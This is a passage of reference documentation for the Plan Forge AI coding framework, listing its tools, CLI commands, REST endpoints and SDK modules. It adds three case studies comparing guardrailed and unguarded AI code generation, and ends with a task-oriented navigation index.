| forge_anvil_stat | Inspect the Anvil memoization cache: entries, bytes, oldest entry, per-tool hit/miss counters |
| forge_anvil_clear | Delete Anvil cache entries, scoped by tool name, by age (olderThanMs), or both |
| forge_anvil_rebuild | Invalidate Anvil cache entries for files changed since a git commit SHA |
| forge_anvil_dlq_list | List dead-letter queue entries: records of cache writes that failed and were quarantined |
| forge_anvil_dlq_drain | Drain (purge) dead-letter queue entries from the Anvil memoization cache |
| forge_local_search | Semantic search over local .forge/ thought stores, with a TF-IDF or neural embeddings backend |
| forge_local_recall_status | Inspect and manage the persistent TF-IDF index cache used by forge_local_search |
| forge_embedding_status | Report embedding backend status: whether @xenova/transformers (neural) or TF-IDF is active, corpus size, configured backend override |
| forge_drift_report | Score codebase against architecture guardrail rules, track drift over time |
| forge_health_trend | Aggregate drift, cost, incidents, model performance over configurable window |
| forge_hotspot | Identify git churn hotspots, files that change most frequently |
| forge_alert_triage | Rank incidents + drift violations by severity × recency |
| forge_incident_capture | Capture an incident, description, severity, files, resolution time (MTTR) |
| forge_deploy_journal | Record a deployment, version, deployer, notes, optional slice ref |
| forge_dep_watch | Scan dependencies for known vulnerabilities (npm audit / equivalent) |
| forge_secret_scan | Post-commit entropy analysis, scan git diff for likely leaked secrets |
| forge_env_diff | Compare env var keys across .env files, detect missing keys |
| forge_liveguard_run | Run all applicable LiveGuard checks in a single call, return unified report |
| forge_diff_classify | Classify staged git diff against 6 safety categories: leaked-secret, prompt-injection, eval/exec introduction, license-incompatible paste, scope-undeclared change, and test-only change |
| forge_fix_proposal | Generate 1-3 slice fix plan from drift / incident / secret / Crucible / tempering finding |
| forge_runbook | Generate human-readable operational runbook from a hardened plan |
| forge_diagnose | Multi-model bug investigation, dispatch to multiple models, synthesize root cause |
| forge_skill_status | Recent skill execution events from the WebSocket hub history |
| forge_run_skill | Execute a skill programmatically, parse SKILL.md, run with validation gates |
| forge_org_rules | Consolidate .github/instructions/*.instructions.md for org-level Copilot |
| forge_watch | Read-only observer that tails another project's pforge run |
| forge_watch_live | Live event stream from another project's pforge run for a fixed duration |
| forge_review_add | Add an item to the review queue |
| forge_review_list | List review queue items with filters and pagination |
| forge_review_resolve | Resolve an open review item (approve/reject/defer) |
| forge_delegate_to_agent | Route a tempering bug to the appropriate agent/skill for read-only analysis |
| forge_notify_send | Send a notification directly via a named adapter (bypass routing) |
| forge_notify_test | Test notification adapter configuration |
| forge_search | Search across runs, bugs, incidents, tempering, hub events, review queue, memories, plans |
| forge_timeline | Unified chronological view across all sources with correlationId grouping |
| forge_home_snapshot | Aggregated snapshot of Crucible, runs, LiveGuard, Tempering + trimmed feed |
| forge_capabilities | Machine-readable API surface, tools, CLI, workflows, config, dashboard, extensions |
| forge_testbed_run | Run a testbed scenario against an external testbed repository |
| forge_testbed_findings | Query testbed defect-log findings |
| forge_testbed_happypath | Run all happy-path testbed scenarios sequentially |
| forge_ext_search | Search the Plan Forge community extension catalog |
| forge_ext_info | Detailed info for a specific extension (author, version, install command) |
| forge_master_ask | Ask Forge-Master to reason about workflows (read-only orchestration) |
| forge_generate_image | Generate an image via xAI Grok Aurora or OpenAI DALL-E |
| forge_meta_bug_file | File a self-repair meta-bug against Plan Forge itself |
Call forge_capabilities for the machine-readable manifest with full schemas, cost tiers, intent tags, and error maps.
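The table describes forge_secret_scan as entropy analysis. A minimal sketch of that general technique, Shannon entropy per character, follows. It is not the tool's implementation: the function names, the minimum length of 20, and the 4.0-bit threshold are assumptions chosen for illustration.

```typescript
// Shannon entropy in bits per character: H = -sum(p * log2(p)).
function shannonEntropy(text: string): number {
  const counts = new Map<string, number>();
  for (let i = 0; i < text.length; i++) {
    const ch = text.charAt(i);
    counts.set(ch, (counts.get(ch) ?? 0) + 1);
  }
  let bits = 0;
  counts.forEach((count) => {
    const p = count / text.length;
    bits -= p * Math.log2(p);
  });
  return bits;
}

// Hypothetical thresholds, chosen for illustration only.
function looksLikeSecret(token: string, minLength = 20, minBits = 4.0): boolean {
  return token.length >= minLength && shannonEntropy(token) >= minBits;
}
```

Repetitive strings score near zero and random-looking tokens score high, which is why entropy works as a cheap first filter. Real scanners usually pair it with pattern rules, because long identifiers and hashes can also score high.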
CLI (pforge)
Canonical source: pforge.ps1 + pforge.sh (mirror implementations). Schema doc: pforge-mcp/cli-schema.json. The full reference with arguments, flags, and examples lives in Chapter 8 · CLI Reference; this is the one-line index.
| Command | Purpose |
|---|---|
| pforge smith | Diagnose environment + setup health |
| pforge check | Validate setup files |
| pforge validate (alias) | Validate Plan Forge setup |
| pforge status | Show phase status from roadmap |
| pforge sweep | Scan for TODO/FIXME markers |
| pforge tour | Guided walkthrough of installed Plan Forge files |
| pforge help | Show help |
| pforge config get/set <k> [v] | Read or write keys in .forge.json (atomic) |
| pforge update | Update framework files (auto-selects source) |
| pforge self-update | Force-pull latest GitHub release |
| pforge install | First-time install bootstrap |
| pforge init | Initialize a new project |
| pforge new-phase <name> | Create a new phase plan + roadmap entry |
| pforge analyze | Cross-artifact consistency scoring (0-100) |
| pforge run-plan <plan> | Execute a hardened plan |
| pforge diff <plan> | Compare changes against plan Scope Contract |
| pforge phase-status | Update phase status in DEPLOYMENT-ROADMAP |
| pforge regression-guard <plan> | Run validation gates from plan files |
| pforge plan-from-sarif <sarif> | Generate a fix plan from a SARIF findings file |
| pforge fix-proposal <finding> | Generate a 1-3 slice fix plan |
| pforge runbook <plan> | Generate operational runbook from a plan |
| pforge branch <plan> | Create git branch from plan's Branch Strategy |
| pforge commit | Auto-generate conventional commit from slice goal |
| pforge version-bump [v] | Update VERSION + package.json + badges |
| pforge team-dashboard | Per-developer cards in the terminal |
| pforge team-activity | Query the team-activity.jsonl ledger |
| pforge sync-memories | Generate .github/copilot-memory-hints.md |
| pforge sync-instructions | Generate .github/copilot-instructions.md |
| pforge sync-spaces | Sync inter-project memory spaces |
| pforge github status | Inspect GitHub-native AI surface |
| pforge github metrics | Live repo metrics via gh CLI |
| pforge org-rules | Export org-level custom instructions |
| pforge drift | Score codebase against architecture guardrails |
| pforge hotspot | Identify git churn hotspots |
| pforge health-trend | Drift, cost, incidents, model perf over time |
| pforge digest | Daily digest, yesterday's deltas + anomalies |
| pforge triage | Triage open alerts by priority |
| pforge dep-watch | Dependency vulnerability + freshness |
| pforge incident capture | Record an incident |
| pforge deploy-log | Record a deployment |
| pforge audit-loop | Drive a single audit-loop iteration |
| pforge audit list/show | Inspect classifier audit findings |
| pforge hammer-fm | Run the full tempering harness (false-marker scan) |
| pforge testbed-happypath | Run all happy-path testbed scenarios |
| pforge regression-guard (also a plan command) | Run gates as guard |
| pforge mcp-call <tool> ... | Invoke any MCP tool not yet wrapped by a verb |
| pforge drain-memory | Drain OpenBrain queue via local MCP REST |
| pforge migrate-memory | Merge legacy *-history.json into .jsonl |
| pforge fm-session | Start a Forge-Master reasoning session |
| pforge fm-recall | Recall a prior Forge-Master session |
| pforge anvil stat/purge | Inspect / reset the Δ-only memoization layer |
| pforge lattice index/stat/... | Code-graph index commands |
| pforge secret-scan | Scan recent commits for high-entropy strings |
| pforge env-diff | Compare .env keys across environments |
| pforge quorum-analyze | Assemble quorum prompt from LiveGuard data |
| pforge hallmark verify | Verify Hallmark provenance envelopes |
| pforge ext add/remove/... | Extension management |
Total: 57+ top-level CLI commands across 7 functional areas. Run pforge --help for the live listing on your installed version.
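To make the env-diff idea concrete (compare .env keys across environments and detect missing ones), here is a small sketch of a key comparison. It is an illustration under assumptions, not the pforge env-diff implementation: the envKeys and missingKeys helpers are hypothetical, and the parsing handles only simple KEY=value lines, comments, and an optional export prefix.

```typescript
// Extract variable names from .env-style text, skipping blanks and comments.
function envKeys(text: string): Set<string> {
  const keys = new Set<string>();
  for (const raw of text.split(/\r?\n/)) {
    const line = raw.trim();
    if (line === "" || line.startsWith("#")) continue;
    const eq = line.indexOf("=");
    if (eq > 0) {
      // Drop an optional leading "export " so "export FOO=1" yields "FOO".
      keys.add(line.slice(0, eq).trim().replace(/^export\s+/, ""));
    }
  }
  return keys;
}

// Keys present in the reference file but absent from the candidate, sorted.
function missingKeys(reference: string, candidate: string): string[] {
  const have = envKeys(candidate);
  return Array.from(envKeys(reference))
    .filter((key) => !have.has(key))
    .sort();
}
```

Only key names are compared, never values, so a check of this kind can run against production files without reading secrets into a report.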
REST (/api/*)
Canonical source: handlers in pforge-mcp/server.mjs + pforge-mcp/dashboard/. Full per-endpoint reference: Appendix W · REST API Reference; raw dump in docs/REST-API.md on GitHub. OpenAPI spec: GET /api/openapi.json.
The 116 endpoints are organized under these prefixes (one-line summary each; see Appendix W for verbs, query params, request/response shapes, and error codes):
| Prefix | Endpoints | Covers |
|---|---|---|
| /api/plan | ~10 | Plan execution, status, abort, runs |
| /api/cost | ~6 | Cost report, estimate-quorum, estimate-slice |
| /api/team | ~5 | Team dashboard, activity feed, ledger queries |
| /api/copilot-instructions | 3 | Read / preview / sync the trilogy file pair |
| /api/graph | ~5 | Knowledge graph query, stats, rebuild |
| /api/lattice | ~5 | Code-graph index, query, callers, blast |
| /api/liveguard | ~6 | Secret scan, env diff, unified run, runbooks |
| /api/bugs | ~6 | Register, list, update-status, validate-fix |
| /api/crucible | ~10 | Submit, ask, preview, finalize, abandon, import, list, status |
| /api/tempering | ~6 | Scan, status, run, drain, approve-baseline |
| /api/incident | ~4 | Capture, list, MTTR, deploy-journal |
| /api/health | ~5 | Drift report, trends, hotspot, alert triage |
| /api/review | 3 | Add / list / resolve review queue items |
| /api/forge-master | ~4 | Read-only reasoning agent ask + session mgmt |
| /api/search | ~3 | Cross-artifact search, timeline, home snapshot |
| /api/notify | 2 | Send / test notification adapters |
| /api/ext | ~4 | Extension search, info, install, remove |
| /api/anvil | ~5 | Cache stat, clear, rebuild, DLQ list, DLQ drain |
| /api/embedding | ~2 | Embedding backend status, local-recall index status |
| /api/audit | 1 | Audit event export (paginated, filterable by date / type / run) |
| /api/hub | 1 (WS) | WebSocket event stream, 60+ event types |
| /api/openapi.json | 1 | OpenAPI 3 spec for the entire surface (codegen-ready) |
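As a sketch of what a bearer-authenticated REST call looks like, the helper below builds the request for GET /api/openapi.json, the one endpoint path this appendix spells out in full. The RequestPlan type, the openApiRequest name, and the localhost base URL and token in the example are assumptions; substitute the host, port, and token of your own server.

```typescript
interface RequestPlan {
  url: string;
  method: "GET";
  headers: Record<string, string>;
}

// Build a bearer-authenticated GET for the OpenAPI spec.
// baseUrl and token are placeholders supplied by the caller.
function openApiRequest(baseUrl: string, token: string): RequestPlan {
  return {
    // Trim trailing slashes so the joined URL has exactly one separator.
    url: `${baseUrl.replace(/\/+$/, "")}/api/openapi.json`,
    method: "GET",
    headers: {
      Authorization: `Bearer ${token}`,
      Accept: "application/json",
    },
  };
}

// Hypothetical host, port, and token, for illustration only.
const plan = openApiRequest("http://localhost:3000/", "example-token");
```

With a server running, the result can be handed to fetch(plan.url, { method: plan.method, headers: plan.headers }). Keeping request construction separate from the network call makes the auth header easy to unit-test.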
SDK (pforge-sdk)
Twelve sub-paths, all pure Node.js (zero runtime dependencies). Full reference: pforge-sdk/README.md on GitHub.
| Import | Key exports | Use when |
|---|---|---|
| pforge-sdk | Re-exports all sub-paths below | Single import for all SDK utilities |
| pforge-sdk/tools | tools, getTool, getToolsByRisk, getToolsByIntent | Loading + filtering the MCP tool registry from Node.js |
| pforge-sdk/hallmark | buildProvenance, validateProvenance, mergeProvenance | Stamping / validating Hallmark provenance envelopes |
| pforge-sdk/chunker | validateChunk, CHUNK_KINDS | Validating Lattice code-graph chunk records |
| pforge-sdk/client v0.4.0 | PForgeClient, createClient, PForgeClientError | Calling the Plan Forge REST API from Node.js without raw fetch |
| pforge-sdk/anvil v0.5.0 | computeAnvilKey, anvilEntryPath, anvilCacheDir, anvilStatsPath | Computing Anvil cache keys + paths without running the server |
| pforge-sdk/lattice-query v0.5.0 | LatticeQueryBuilder, tokenizeForSearch, scoreChunk | Building fluent Lattice queries + scoring chunks without the server |
| pforge-sdk/notifications/adapter-contract v0.5.0 | validateAdapterShape, ERR_NOT_IMPLEMENTED | Validating a custom notification adapter shape before registering it |
| pforge-sdk/run-reader v0.6.0 | listRuns, readRunMeta, readRunSummary, readRunIndex, parseEventLine | Offline access to .forge/runs/ artifacts, no running server required |
| pforge-sdk/plan-reader v0.7.0 | listPlans, readPlan, getPlanStatus, getPlanSlices, plansDir | Offline access to docs/plans/ plan files: read status, slices, and frontmatter without a server |
| pforge-sdk/thought-reader v0.8.0 | readThoughts, readAllThoughts, listThoughtSources, parseThoughtLine, thoughtFilePath | Offline access to .forge/*.jsonl thought stores: OpenBrain queue, archive, DLQ, and LiveGuard memories |
| pforge-sdk/digest-reader v0.9.0 | listDigests, readDigest, readLatestDigest, overallSeverity, getSectionsByMinSeverity, digestFilePath | Offline access to .forge/digests/*.json daily digest files: list, read, and compute severity |
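The lattice-query sub-path exports tokenizeForSearch and scoreChunk, whose signatures are not shown in this appendix. To illustrate what camelCase-aware ranking means in general, here is a standalone sketch with deliberately different, hypothetical names (splitIdentifier, overlapScore). It does not reproduce the SDK's behavior or scoring formula.

```typescript
// Split an identifier on camelCase and separator boundaries, lowercased.
function splitIdentifier(identifier: string): string[] {
  return identifier
    .replace(/([a-z0-9])([A-Z])/g, "$1 $2") // getUser -> get User
    .replace(/([A-Z]+)([A-Z][a-z])/g, "$1 $2") // HTTPServer -> HTTP Server
    .split(/[^A-Za-z0-9]+/)
    .filter((part) => part.length > 0)
    .map((part) => part.toLowerCase());
}

// Fraction of query tokens that appear among the chunk name's tokens.
function overlapScore(query: string, chunkName: string): number {
  const queryTokens = splitIdentifier(query);
  if (queryTokens.length === 0) return 0;
  const nameTokens = new Set(splitIdentifier(chunkName));
  const hits = queryTokens.filter((token) => nameTokens.has(token)).length;
  return hits / queryTokens.length;
}
```

Under this scheme a query such as "user id" matches getUserById in full, even though neither word appears as a standalone token in the raw identifier.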
Not every capability is exposed through every surface. This matrix shows which features have CLI wrappers, REST endpoints, and SDK helpers. Use it to pick the right surface for a caller.
| Capability | MCP | CLI | REST | SDK |
|---|---|---|---|---|
| Plan execution (run-plan) | ✓ | ✓ | ✓ | ✓ |
| Cost reporting + estimates | ✓ | ✓ | ✓ | ✓ |
| Copilot trilogy (memory + instructions sync) | ✓ | ✓ | ✓ | ✓ |
| Team dashboard + activity | ✓ | ✓ | ✓ | ✓ |
| Knowledge graph queries | ✓ | ✓ | ✓ | ✓ |
| Daily digest | — | ✓ | ✓ | ✓ |
| LiveGuard checks (secret/env/full) | ✓ | ✓ | ✓ | ✓ |
| Tempering (scan, run, drain) | ✓ | ✓ | ✓ | ✓ |
| Crucible smelting | ✓ | ✓ | ✓ | ✓ |
| Forge-Master (read-only reasoning) | ✓ | ✓ | ✓ | ✓ |
| Lattice code graph | ✓ | ✓ | ✓ | ✓ |
| Hallmark stamp / verify | — | ✓ | — | ✓ |
| Anvil purge / stat | — | ✓ | ✓ | ✓ |
| Bug registry CRUD | ✓ | — | ✓ | ✓ |
| WebSocket live events | — | — | ✓ | ✓ |
| Self-update / install | — | ✓ | — | — |
| Notification adapter contract validation | — | — | — | ✓ |
| Offline run artifact access (run-reader) | — | — | — | ✓ |
| Offline plan file access (plan-reader) | — | — | — | ✓ |
| Offline thought store access (thought-reader) | — | — | — | ✓ |
| Offline digest file access (digest-reader) | — | — | — | ✓ |
| Anvil cache management | ✓ | ✓ | ✓ | ✓ |
| Semantic recall / local search | ✓ | — | — | — |
| Extension marketplace | ✓ | ✓ | ✓ | — |
pforge install only makes sense as a CLI command; WebSocket live events have no CLI representation (subscribe via REST + WS).
Three short case studies from production runs, each absorbed from a contemporary blog post and condensed to the parts that survive when the version numbers change. The vignettes are arranged from the largest reframe (Vignette 1, the loop that never ends) to the most quantitative receipt (Vignette 2, the 99-vs-44 A/B test) to the most operational pattern (Vignette 3, the three-model quorum run).
Audience: Readers who want concrete worked examples before committing to the chapters. Especially useful for stakeholders evaluating Plan Forge for adoption.
How to use: Read in order, or skip to the vignette closest to your situation. Each one ends with a "Where to read more" pointer into the canonical chapter that owns the topic and a citation to the original blog post for the first-person account.
| Vignette | What it shows | Source post |
|---|---|---|
| 1. The Loop That Never Ends | The full closed-loop audit of a real production Next.js site: a Node discovery crawler emitting structured JSON, a three-lane triage filter, the Crucible eating the bug lane, Tempering re-auditing with the same harness that discovered, and the bug registry auto-smelting regressions back into the next pass, running unattended. | blog post |
| 2. The .NET A/B Test — 99 vs 44 | The same .NET 10 WebAPI built twice from an identical skeleton on the same machine, same afternoon, same Claude Opus 4.6 model. One run with Plan Forge guardrails, one with pure vibe coding. 99 vs 44 on structural quality (4.6× more tests, 6 vs 0 interfaces, 9 vs 0 DTOs), in less wall-clock time. | blog post |
| 3. Quorum Mode in Practice | The same C# invoicing slice executed twice from one hardened plan: once with the default single-model worker, once with a three-model quorum. Both passed every gate and the independent reviewer. The quorum run cost $0.22 more, produced +20% tests, extracted DRY helpers the single run inlined, used relative test dates that survive the calendar, and emitted modern .NET 7+ exception patterns. | blog post |
All three vignettes preserve the pseudonyms used in the original blog posts. "TheProject" in Vignette 1 is a real production Next.js site the maintainer operates; the owner did not clear the real name for publication. Every metric is from the actual run.
Source: "The Loop That Never Ends" · Subject: TheProject (production Next.js site) · What it demonstrates: the closed-loop architecture from Discovery to Tempering, running without a human in the loop after the first pass.
TheProject is a production Next.js site: marketing pages, a product catalog, a handful of interactive demos. Like most sites that grow organically, it had accumulated the usual rot: placeholder copy that never got replaced, stale /docs routes, console errors nobody noticed, href="#" waiting to be wired up. The maintainer had two options: sit down with a checklist and grind through it, or wire the rot into Plan Forge's closed loop and let the loop close on itself.
Plan Forge's seven-step pipeline reads as a straight line in the diagrams, but the production shape is circular. Four passes, with back-edges that matter as much as the forward ones:
.forge/audits/dev-<ts>.json, groups findings by route and severity, and for each group calls forge_crucible_submit with a title, the raw evidence, and a priority derived from the severity bucket. The Crucible runs its usual interview, and the hardener emits a Phase-NN plan with a Scope Contract.
pforge run-plan the project uses on itself. The interesting part is what happens after the last slice commits: Tempering re-runs the discovery harness against the newly-deployed preview URL. If the same JSON query that found the problem now returns empty, Tempering reports green. If not, the failures get written to the bug registry.
The first version of the Crucible wrapper routed every finding through the Crucible. Console errors, 404s, auth redirects, placeholder regex hits: all of it became a proposed smelt for the Crucible to interview. The interview queue grew to 60+ items, and half were noise the Crucible had no business thinking about.
The fix was a three-lane triage before the Crucible ever saw a finding:
| Lane | What goes here | What happens |
|---|---|---|
| Bug lane | Findings with evidence and scope: broken links, console errors, missing assets. | Skip the Crucible entirely. These are not ideas, they are bugs. Route to the bug registry; let auto-smelt fix them in a single pass. |
| Crucible lane | Scope-ambiguous feature work the audit revealed: empty CTAs, "Coming soon" sections, half-built flows. | Submit to the Crucible. The Crucible interviews for scope, the hardener emits the plan, the Forge executes. |
| Noise lane | Auth-redirect 307s, 404s on test-data routes, false-positive regex hits. | Filter at the harness. Never reach the Crucible. Tune signal-to-noise at the source: a discovery harness that cries wolf on auth redirects teaches the Crucible to ignore it. |
The bug lane runs first: fix the known defects, watch Tempering validate them, and prove the mechanics end-to-end. Only then does the feature (Crucible) lane open. If Round 1's bug lane fails, auto-smelt re-ingests and retries without the human. The loop eats its own mistakes before it ever touches the feature backlog. That ordering is what makes the feature lane safe to run unattended.
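The three lanes and the bug-first ordering can be sketched as a small classifier. The Finding shape, the kind values, and the /test-data/ prefix below are hypothetical stand-ins for whatever the real discovery harness emits, and treating every 307 as an auth redirect is a simplification made for the example.

```typescript
type Lane = "bug" | "crucible" | "noise";

// Hypothetical finding shape; the real harness output may differ.
interface Finding {
  kind: "broken-link" | "console-error" | "missing-asset" | "placeholder" | "empty-cta" | "http-status";
  route: string;
  status?: number;
}

// Hypothetical prefix marking test-data routes.
const TEST_DATA_PREFIX = "/test-data/";

function triage(finding: Finding): Lane {
  // Noise lane: auth redirects and 404s on test-data routes are filtered first.
  if (finding.kind === "http-status") {
    if (finding.status === 307) return "noise";
    if (finding.status === 404 && finding.route.startsWith(TEST_DATA_PREFIX)) return "noise";
    return "bug";
  }
  // Crucible lane: scope-ambiguous feature work the audit revealed.
  if (finding.kind === "placeholder" || finding.kind === "empty-cta") return "crucible";
  // Bug lane: findings with evidence and scope.
  return "bug";
}

// Split a round into the bug lane (runs first) and the feature lane; noise is dropped.
function planRound(findings: Finding[]): { bugs: Finding[]; features: Finding[] } {
  return {
    bugs: findings.filter((f) => triage(f) === "bug"),
    features: findings.filter((f) => triage(f) === "crucible"),
  };
}

// Illustrative findings only.
const sampleFindings: Finding[] = [
  { kind: "http-status", route: "/account", status: 307 },
  { kind: "broken-link", route: "/docs/old" },
  { kind: "empty-cta", route: "/pricing" },
];
const round = planRound(sampleFindings);
```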
Over two weeks, with no manual TODO list and no human in the loop after the initial wrapper, the system found 23 placeholders the maintainer did not know existed, 7 broken links from a migration the previous month, and a console error in the checkout flow that had been silently firing for weeks. The loop is still finding things, slower now, but steady.
Four conditions, in order of how long they took to learn:
{"route": "/pricing", "placeholders": ["Coming soon", "TODO: price tiers"], "broken_hrefs": ["#"]}. The discovery harness exists to turn the first into the second.
Source: "The A/B Test: 99 vs 44 - Same App, Same Model, Same Time" · Subject: a .NET 10 WebAPI built twice · What it demonstrates: the structural-quality gap between Plan Forge and vibe coding when every other variable is held constant.
Both projects started from an identical .NET 10 WebAPI skeleton, the same git commit, the same empty solution. The requirements were identical: Clients CRUD → Projects CRUD → Invoice Engine with rate tiers, volume discounts, tax calculation, and banker's rounding. Both runs used Claude Opus 4.6. Same machine, same afternoon. The only variable was whether the AI had guardrails.
| Metric | Plan Forge (A) | Vibe coding (B) | Delta |
|---|---|---|---|
| Duration | ~7 min | ~8 min | guardrails did not add overhead |
| Tests | 60 | 13 | 4.6× more |
| Interfaces | 6 | 0 | vibe = 0 |
| DTOs | 9 | 0 | vibe = 0 |
| Typed exceptions | 4 | 0 | vibe = 0 |
| Error middleware | ProblemDetails (RFC 7807) | none | vibe had no error contract |
| Banker's rounding | 5 usages | 0 | requirement silently dropped by vibe |
| CancellationToken | 79 refs | 0 | vibe = 0 |
| .gitignore | present | missing | vibe committed bin/ and obj/ |
| Quality score (/100) | 99 | 44 | 2.25× higher |
The Plan Forge run produced more code, and it produced the right code:
- Typed exceptions (NotFoundException, DuplicateException, ValidationException, BusinessRuleException) mapped via ProblemDetails (RFC 7807) to proper HTTP status codes.
- Banker's rounding (MidpointRounding.ToEven) on every financial calculation, the requirement that was explicitly stated but silently dropped by the vibe run.

The vibe-coded version works. You can start it, call the endpoints, and get responses. It also has structural problems that block production deployment: 12 build errors on first attempt (the model removed the EF Core decimal precision configuration to make the build pass, silently violating the banker's rounding requirement), no interfaces (controllers cannot be unit-tested), entities exposed directly as API responses (change a column, break the API contract), and 111 build-output files committed in the initial git commit because no .gitignore was generated.
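Banker's rounding is the round-half-to-even rule that MidpointRounding.ToEven selects in .NET. As an illustration only, with Python's decimal module standing in for the C# code (which is not reproduced here), the sketch below shows where it differs from round-half-up. The helper names are hypothetical.

```python
from decimal import Decimal, ROUND_HALF_EVEN, ROUND_HALF_UP

CENT = Decimal("0.01")


def bankers_round(amount: str) -> Decimal:
    """Round to cents; exact midpoints go to the nearest even cent."""
    return Decimal(amount).quantize(CENT, rounding=ROUND_HALF_EVEN)


def half_up_round(amount: str) -> Decimal:
    """Round to cents; exact midpoints always go up."""
    return Decimal(amount).quantize(CENT, rounding=ROUND_HALF_UP)


# The two rules disagree only on exact midpoints whose preceding digit is even.
print(bankers_round("2.345"), half_up_round("2.345"))  # 2.34 2.35
print(bankers_round("2.355"), half_up_round("2.355"))  # 2.36 2.36
```

Amounts are passed as strings so that the midpoint is exact; building a Decimal from a binary float would lose it.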
The conventional wisdom is that structure slows you down. More rules, more process, more overhead. Skip the architecture, skip the tests, ship faster. The numbers tell a different story: Plan Forge produced 4.6× more tests and a 2.25× higher quality score in less wall-clock time (7 vs 8 minutes). The guardrails did not add overhead. They prevented the rework loop. The vibe run spent its extra minute fighting the EF Core build errors and applying a fix that sacrificed a requirement.
Guardrails do not slow you down. Rework slows you down. Guardrails prevent rework.
Source: "Quorum Mode: What Happens When 3 AI Models Review Each Other's Code" · Subject: the same C# invoicing slice, executed twice · What it demonstrates: the synthesis effect. When three models propose and the reviewer picks the cleanest approach, quality compounds for cents on the dollar.
One feature, two executions, identical hardened plan:
Both runs passed every gate. Every slice built, every test passed, and the independent reviewer signed off on both. The interesting part is how they passed.
| Metric | Single (control) | Quorum (3-model) |
|---|---|---|
| Tests written | 15 | 18 (+20%) |
| Helper extraction | Inline, repeated 3× | Reusable helpers, single source |
| Test dates | Hardcoded literals | Relative offsets |
| .NET exception pattern | Generic ValidationException | ArgumentException.ThrowIfNullOrWhiteSpace (.NET 8+) |
| Edge cases covered | Standard happy path | Voided-invoice regeneration, sequence races |
| Total cost | $0.62 | $0.84 (+$0.22) |
| Total time | 12 min | 32 min (2.7×) |
The single-model and quorum runs do not differ in code volume; they differ in code shape. Four named patterns drive the gap:
- Helper extraction: the quorum run extracted IsWeekend(), CalculateVolumeDiscount(), and ApplyBankersRounding() as private static helpers because the synthesizer saw multiple proposals and picked the one that did not repeat itself.
- Test dates: the single run used hardcoded literals (new DateTime(2026, 3, 15)). Those tests fail when the dates pass and the business logic correctly refuses future invoices. Quorum tests used relative offsets (DateTime.Now.AddDays(-7)) that stay green forever.
- .NET exception pattern: the single run used throw new ValidationException("..."), functional but generic. The quorum run used ArgumentException.ThrowIfNullOrWhiteSpace(), the recommended API on .NET 8+. One model knew about it, and the reviewer picked it.
- Edge cases: the quorum run covered voided-invoice regeneration and sequence races; the single run covered the standard happy path.

The quorum run cost $0.22 more than the control run ($0.84 vs $0.62), about 35% in percentage terms, but still under a dollar total. For a feature that will be maintained for years, the differential is a rounding error. The time delta was more significant: 32 minutes vs 12 minutes. The extra twenty minutes is the parallel dry-run analysis (three models thinking) plus the reviewer synthesis step. The actual build time was comparable.
For $0.22 more, you get 20% more tests, cleaner architecture, and modern patterns. That is the cheapest code review you will ever buy.
Quorum mode is not for every slice. Running it on a simple CRUD endpoint that creates a database record is overkill. Running it on an auth flow, billing logic, or a database migration is worth every token. The default --quorum=auto mode scores each slice's complexity (1–10) using seven weighted signals (file scope count, cross-module dependencies, security keywords, database/migration keywords, gate count, task count, historical failure rate), and only slices at or above the threshold (default 6) get the three-model treatment.
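A minimal sketch of how a weighted score could gate quorum. The manual names the seven signals but not their weights or normalization, so the equal weights, the 0-to-1 signal scale, and both function names below are assumptions made for illustration.

```python
# Hypothetical weights: equal by assumption, since the real rubric is not shown here.
WEIGHTS = {
    "file_scope_count": 1.0,
    "cross_module_dependencies": 1.0,
    "security_keywords": 1.0,
    "database_keywords": 1.0,
    "gate_count": 1.0,
    "task_count": 1.0,
    "historical_failure_rate": 1.0,
}


def complexity_score(signals: dict[str, float]) -> int:
    """Map per-signal values (assumed normalized to 0..1) onto a 1-10 score."""
    total_weight = sum(WEIGHTS.values())
    weighted = sum(
        weight * min(max(signals.get(name, 0.0), 0.0), 1.0)
        for name, weight in WEIGHTS.items()
    )
    return 1 + round(9 * weighted / total_weight)


def uses_quorum(signals: dict[str, float], threshold: int = 6) -> bool:
    """Only slices scoring at or above the threshold get the three-model run."""
    return complexity_score(signals) >= threshold
```

Lowering `threshold` sends more slices through quorum, which raises cost in exchange for more review.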
Read together, the three vignettes describe the same shape from three angles. Vignette 1 (the loop) is about making the pipeline survive its own output: Tempering re-auditing with the same tool that made the discovery, the bug registry auto-smelting regressions, the loop running unattended. Vignette 2 (99 vs 44) is about making the software survive its own future: interfaces, DTOs, typed exceptions, and cancellation, the structural quality that separates a prototype from production code. Vignette 3 (quorum) is about making the next slice survive the gap between what one model knows and what another does: the synthesis effect, paid for in cents, banked in code that does not need a second rewrite.
Three vignettes, three different surface areas, one underlying claim: a harness that survives its own output is the difference between a demo and a shop. The chapters this appendix cross-links explain the mechanisms; the blog posts behind the vignettes preserve the first-person account; the receipts above are the part that survives when the version numbers change.
A task-first index over the rest of the manual. Find the verb that matches what you are trying to do; follow the link to the chapter that owns the answer. This appendix adds no new prose; it is pure navigation, sorted by intent rather than by where the chapters happen to live in the book.
Audience: Anyone who knows what they need to do but is not sure which chapter to open. Especially useful when returning to the manual mid-task.
How to use: Pick the intent group closest to your situation, scan the questions, and click the answer link. If a task spans multiple chapters, the index lists each cross-ref; read them in order. If you cannot find what you need here, the Book Index covers concepts and the search box in the sidebar covers everything else.
The index is organized by what you are doing, not by what part of Plan Forge you are touching. Most tasks pull in two or three chapters across different Parts:
| Intent group | When to use |
|---|---|
| 1. Install & set up | You are putting Plan Forge on a fresh machine, or onto a new repository. |
| 2. Plan a feature | You have a feature in mind and need to turn it into a hardened plan the Forge can execute. |
| 3. Execute a plan | The plan exists; you are about to (or are mid-way through) running it. |
| 4. Review & ship | The slices have run; you are deciding whether to merge and what to do post-merge. |
| 5. Customize Plan Forge for my project | You want the agent to follow your team's specific patterns, not just the defaults. |
| 6. Operate at scale (teams & fleets) | You are running Plan Forge across multiple repositories, multiple teams, or in an enterprise context. |
| 7. Debug & troubleshoot | Something is broken, missing, or behaving unexpectedly. |
| 8. Extend & integrate | You want to add new tools, glue Plan Forge to your existing systems, or build something on top. |
| 9. Brief stakeholders & onboard readers | You need to walk a colleague, manager, or VP through what Plan Forge is and why it matters. |
- pforge smith.
- pforge smith; expected output is mirrored in Troubleshooting — What a healthy pforge smith looks like.
- --quorum=auto).
- copilot-instructions.md safely? Customization — Editing copilot-instructions.md.
- .forge.json? Appendix T — .forge.json Reference; every key with type, default, example, and change impact.
- .forge/secrets.json over committing keys to .forge.json.
- forge_team_dashboard.
- pforge-sdk for Node.js clients.
- forge_graph_query; pattern detectors in forge_patterns_list.
